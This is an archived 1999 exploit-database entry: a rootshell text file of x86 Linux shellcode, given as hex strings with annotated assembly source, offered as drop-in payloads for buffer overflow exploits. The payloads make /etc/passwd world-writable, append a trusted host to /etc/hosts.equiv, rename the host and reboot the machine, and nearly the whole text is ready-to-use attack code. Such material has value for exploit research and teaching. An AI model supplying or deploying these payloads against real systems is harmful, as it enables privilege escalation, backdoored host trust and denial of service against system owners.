Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

asmcodes.txt

🗓️ 17 Aug 1999 00:00:00Reported by Packet StormType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 26 Views

Assembly code examples for buffer overflow exploits and actions on system files.

Code
`  
[ http://www.rootshell.com/ ]  
  
-----------------[ begin asmcodes.txt ]---------------------  
  
-- Assembly drop in replacements --  
(Probably useless, but can be a little fun ;-) )  
  
Here are some assembly instructions that you can drop into your favorite  
buffer overflow exploit. Generally, replacing existing shellcodes in  
existing buffer overruns with one these is all you need to do. Feel free to  
modify and experiment with these. (Sorry about the null's in them before  
;-) )  
  
/* This one changes the mode on /etc/passwd to 777 */  
char shellcode[]=  
"\xeb\x03\x5f\xeb\x05\xe8\xf8\xff\xff\xff\x31\xdb\xb3\x1d"  
"\x01\xfb\x30\xc0\x88\x43\x0b\x31\xc9\x66\xb9\xff\x01\x31\xc0\xb0"  
"\x0f\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x2f\x65\x74\x63\x2f\x70\x61"  
"\x73\x73\x77\x64\x89\xec\x5d\xc3";  
  
/* This one creates /etc/hosts.equiv with a host called b00ger */  
char shellcode[]=  
"\xeb\x03\x5f\xeb\x05\xe8\xf8\xff\xff\xff\x31\xdb\xb3\x35"  
"\x01\xfb\x31\xc0\x88\x43\x10\x31\xc9\x66\xb9\x41\x04\x31\xd2\x66\xba"  
"\xa4\x01\x31\xc0\xb0\x05\xcd\x80\x89\xc3\x31\xc9\xb1\x46\x01\xf9\x31"   
"\xd2\xb2\x07\x31\xc0\xb0\x04\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x2f\x65"  
"\x74\x63\x2f\x68\x6f\x73\x74\x73\x2e\x65\x71\x75\x69\x76\x01\x62\x30"  
"\x30\x67\x65\x72\x0a\x89\xec\x5d\xc3";  
  
/* This one is useless: it just changes the hostname to yEw_r_0wn3d */  
char shellcode[]=  
"\xeb\x03\x5f\xeb\x05\xe8\xf8\xff\xff\xff"  
"\x31\xc0\xb0\x4a\x31\xdb\xb3\x16\x01\xfb\x31\xc9\xb1"  
"\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x79\x45\x77\x5f"  
"\x72\x5f\x30\x77\x6e\x33\x64\x89\xec\x5d\xc3";  
  
/* This is also useless: it just reboots an x86 machine */  
char shellcode[]=  
"\xeb\x03\x5f\xeb\x05\xe8\xf8\xff"  
"\xff\xff\x31\xc0\xb0\x24\xcd\x80\x31\xc0\xb0"  
"\x58\xbb\xad\xde\xe1\xfe\xb9\x69\x19\x12\x28"  
"\xba\x67\x45\x23\x01\xcd\x80\x31\xc0\xb0\x01"  
"\xcd\x80\x89\xec\x5d\xc3";  
  
  
-- Source code --  
  
# changes mode on /etc/passwd to 777   
# making it writeable by anyone.   
  
jmp rootshell  
hey:  
popl %edi  
jmp yo  
rootshell:  
call hey  
yo: # yo! w3rD!  
# chmod() is system call 15 (0xf)  
# (see /usr/include/asm/unistd.h)  
# eax contains syscall number   
xorl %ebx,%ebx # ebx has path to file  
movb $(phile-yo),%bl  
addl %edi,%ebx   
xorb %al,%al # clear out al  
movb %al,11(%ebx) # length of filename (11)  
xorl %ecx,%ecx # clear out ecx  
movw $00777,%cx # ecx contains mode 777  
xorl %eax,%eax # clear out eax  
movb $0xf,%al # syscall 15 (0xf) is chown  
int $0x80 # interrupt (make call)  
xorl %eax,%eax # clear eax  
movb $0x01,%al # syscall 1 (0x01) is exit  
int $0x80 # interrupt (make call)  
phile:  
.ascii \"/etc/passwd\" # /etc/passwd (11)  
  
-------------------------  
  
# Creates the file /etc/hosts.equiv if it does  
# not exist (or appends to if it does) and will  
# insert the host: b00ger  
# changing this should be trivial  
  
jmp rootshell   
coded_by_bmV:   
popl %edi  
jmp phoo  
rootshell:  
call coded_by_bmV  
phoo: # ok. I meant 'foo'  
# open() is system call 5   
# (see /usr/include/asm/unistd.h)  
# eax contains syscall number  
# ebx will have filename  
# ecx contains open flags  
# edx contains mode of file  
# ->file is handle returned to eax  
xorl %ebx,%ebx # clear ebx  
movb $(file-phoo),%bl # filename to open in ebx  
addl %edi,%ebx  
xorl %al, %al # clear out al  
movb %al,16(%ebx) # /etc/hosts.equiv (16)  
xorl %ecx,%ecx # clear out ecx  
movw $0x441,%cx # O_WRONLY | O_CREAT | O_APPEND  
xorl %edx,%edx # clear out edx  
movw $00644,%dx # mode 0644 -rw-r--r--  
xorl %eax,%eax # clear eax  
movb $0x5,%al # syscall 5 (0x5) is open()  
int $0x80 # interrupt (make call)  
# write() is system call 4  
# (see /usr/include/asm/unistd.h)  
# eax contains syscall 4 (write)  
# ebx will have file handle  
# ecx will point to "b00ger"  
# edx is strlen("b00ger");  
movl %eax,%ebx # move file handle to ebx  
xorl %ecx, %ecx # clear out ecx  
movb $(string-phoo),%cl # put "b00ger" in ecx  
addl %edi,%ecx  
xorl %edx,%edx # clear edx  
movb $7,%dl # strlen("b00ger") ==7  
xorl %eax,%eax # clear out eax  
movb $0x04,%al # syscall 4 is write()  
int $0x80 # interrupt (make call)  
xorl %eax,%eax # clean out eax  
movb $0x01,%al # syscall 1 (0x01) is exit()  
int $0x80 # interrupt (make call)  
# exit() should close file  
file:  
.ascii \"/etc/hosts.equiv\"   
.byte 1  
string:  
.ascii \"b00ger\n\"  
  
-------------------------  
  
# written just for grins ;-)  
# code to change to hostname of the  
# target machine to: yEw_r_0wn3d   
# Yes, I know this is useless :P  
  
jmp rootshell  
by_bm5:  
popl %edi  
jmp asmcode  
rootshell:  
call by_bm5  
asmcode: # assembly code ?  
# 74 (0x4a) is sethostname()  
# (see /usr/include/asm/unistd.h)  
# eax will have syscall 74  
# ebx points to "yEw_r_0wn3d"  
# ecx= strlen("yEw_r_0wn3d")==11  
xorl %eax,%eax # clear out eax  
movb $0x4a,%al # move 74 (sethostname()) to al  
xorl %ebx,%ebx # clear out ebx  
movb $(string-asmcode),%bl # put yEw_r_0wn3d in ebx  
addl %edi,%ebx  
xorl %ecx,%ecx # clear out ecx  
movb $0x0b,%cl # strlen("yEw_r_0wn3d")==0xb  
int $0x80 # interrupt (make call)  
xorl %eax,%eax # clear out eax  
movb $0x01,%al # syscall 1 (0x01) is exit()  
int $0x80 # interrupt (make call)  
.byte  
string:  
.ascii \"yEw_r_0wn3d\"  
  
-------------------------  
  
# reboots a Linux x86 box   
# also quite useless, but   
# good for learning.  
  
jmp rootshell   
coded_by_bmV:  
popl %edi  
jmp reb00t  
rootshell:  
call coded_by_bmV  
reb00t: # reboot Linux  
# sync() is syscall 36  
# (see /usr/include/asm/unistd.h)  
xorl %eax,%eax # clear out eax  
movb $0x24,%eax # make syscall to sync()  
int $0x80 # interrupt (make call)  
# reboot() is syscall 88 (0x58)  
# (see /usr/include/asm/unistd.h)  
# eax contains syscall 88 (reboot)  
# ebx will contain magic  
# ecx will contain magic2  
# (see manual page for reboot)  
xorl %eax,%eax # clear out eax  
movb $0x58,%eax # move 88 (reboot()) to eax  
movl $0xfee1dead,%ebx # put magic into ebx  
movl $672274793,%ecx # put magic2 into ecx  
movl $0x1234567,%edx # put flag into edx  
# read reboot manpage!  
int $0x80 # interrupt (make call)  
xorl %eax,%eax # clear out eax  
movb $0x01,%al # syscall 1 (0x01) is exit()  
int $0x80 # interrupt (make call)  
  
-------------------------  
  
--> Have fun!  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
17 Aug 1999 00:00Current
7.4High risk
Vulners AI Score7.4
assembly instructionsbuffer overflowexploit techniquesfile permissionssystem modifications
26